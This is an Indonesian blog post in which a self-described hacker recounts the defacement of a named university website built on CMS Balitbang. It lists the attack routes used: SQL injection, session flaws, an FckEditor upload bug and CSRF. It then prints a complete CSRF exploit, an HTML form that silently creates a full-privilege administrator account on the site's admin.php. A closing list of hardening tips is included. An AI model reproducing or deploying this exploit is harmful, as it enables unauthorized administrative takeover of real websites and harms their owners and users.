Kisah Penjebolan Website UPS Tegal Untuk yang Ke-2 Kalinya

Author: Pangeran.Antok aka MrZer0

Mungkin publik baru mengetahui bahwa jebolnya portal sekaligur server 1 (satu domain) UPS Tegal yang beralamat di[ http://upstegal.ac.id/ ] barulah 1x (satu kali). Padahal itu sudah 2 kali. Kenapa?

Sebab untuk website V1 (versi 1) itu sebetulnya ada  bug di bagian sistem akademik dan perpustakaan, hanya saja jarang dari para peretas (baca:hacker) yang mengetahuinya. Saya termasuk salah seorang yang mengetahui celah itu dan sudah melapor pada admin yang pengelola situs yang bersangkutan, hanya saja belum ada tanggapan sampai detik ini. Saya masih ingat, bug itu saya temukan pada tahun 2010.

Nah pada tahun 20012 website UPS Tegal telah diganti, dengan CMS Balitbang, nah disinilah para peretas banyak yang mengetahui celah keamanannya dikarenakan bug telah terpublish di beberapa situs keamanan sebut saja injector. Alhasil sekitar seminggu yang lalu website UPS ter DAFACE.

Bagaimana caranya:

Ya mereka masuk melalui
1) Celah website Perpustakaan Online yang ada bug SQL nya [maaf link bug tdk sy publish]
2) Celah Web Akademik, session Dosen dan Mahasiswa
3) Bug Website utama UPS yang menggunakan CMS Balitbang yang terdapat bug upload FckEditor
4) celah CSRF. berikut codingnya

<head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>CMS Balitbang - CSRF Exploit</title> </head> <form action="http://http://upstegal.ac.id/admin/admin.php" method="POST"> <input type="hidden" name="newusername" value="mrzero" readonly="readonly" /> <input type="hidden" name="newpassword" value="mrzero" readonly="readonly" /> <input type="hidden" name="newpassword2" value="mrzero" readonly="readonly" /> <input type="hidden" name="newemail" value="mrzero@hacker.org" readonly="readonly" /> <input name="artikel" type="checkbox" value="on" checked='checked' /> <input name="agenda" type="checkbox" value="on" checked='checked' /> <input name="berita" type="checkbox" value="on" checked='checked' /> <input name="bukutamu" type="checkbox" value="on" checked='checked' /> <input name="forum" type="checkbox" value="on" checked='checked' /> <input name="galeri" type="checkbox" value="on" checked='checked' /> <input name="link" type="checkbox" value="on" checked='checked' /> <input name="infoalumni" type="checkbox" value="on" checked='checked' /> <input name="infosekolah" type="checkbox" value="on" checked='checked' /> <input name="materiajar" type="checkbox" value="on" checked='checked' /> <input name="kumpulsoal" type="checkbox" value="on" checked='checked' /> <input name="silabus" type="checkbox" value="on" checked='checked' /> <input name="prestasi" type="checkbox" value="on" checked='checked' /> <input name="pesandepan" type="checkbox" value="on" checked='checked' /> <input name="jajak" type="checkbox" value="on" checked='checked' /> <input name="banner" type="checkbox" value="on" checked='checked' /> <input name="dtnilai" type="checkbox" value="on" checked='checked' /> <input name="dtmateri" type="checkbox" value="on" checked='checked' /> <input name="dtbpbk" type="checkbox" value="on" checked='checked' /> <input name="dtabsensi" type="checkbox" value="on" checked='checked' /> <input name="dtspp" type="checkbox" value="on" checked='checked' /> <input name="dtlaporan" type="checkbox" value="on" checked='checked' /> <input name="admin" type="checkbox" value="on" checked='checked' /> <input name="profil" type="checkbox" value="on" checked='checked' /> <input name="posisi" type="checkbox" value="on" checked='checked' /> <input name="template" type="checkbox" value="on" checked='checked' /> <input name="gambar" type="checkbox" value="on" checked='checked' /> <input name="kategori" type="checkbox" value="on" checked='checked' /> <input name="semester" type="checkbox" value="on" checked='checked' /> <input name="program" type="checkbox" value="on" checked='checked' /> <input name="kelas" type="checkbox" value="on" checked='checked' /> <input name="pelajaran" type="checkbox" value="on" checked='checked' /> <input name="dtguru" type="checkbox" value="on" checked='checked' /> <input name="importguru" type="checkbox" value="on" checked='checked' /> <input name="dtmengajar" type="checkbox" value="on" checked='checked' /> <input name="dtsiswa" type="checkbox" value="on" checked='checked' /> <input name="dtortu" type="checkbox" value="on" checked='checked' /> <input name="importsiswa" type="checkbox" value="on" checked='checked' /> <input name="membersiswa" type="checkbox" value="on" checked='checked' /> <input name="naikkelas" type="checkbox" value="on" checked='checked' /> <input name="dtalumni" type="checkbox" value="on" checked='checked' /> <input name="member" type="checkbox" value="on" checked='checked' /> <input name="koordinator" type="checkbox" value="on" checked='checked' /> <input name="opini" type="checkbox" value="on" checked='checked' /> <input type="hidden" name="mode" value="createadmin" /><input type='reset' value='Ulang' /> <input type="submit" name="Submit" value="Simpan" /> </form>


Bagaimana memproteknya?
1. Update balitbang versi terbaru
2. hapus seluruh file di hosting dan ganti dengan file baru, karena dipastikan hacker telah banyak menyisipkan shell ke hosting UPS
3. file config harus 644
4. sering maintenance dan amati log nya
5. Perbaiki bug sql dan xss pada sistem akademik dan perpustakaan online

Salam

Share on Google Plus

About Elmirakom

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.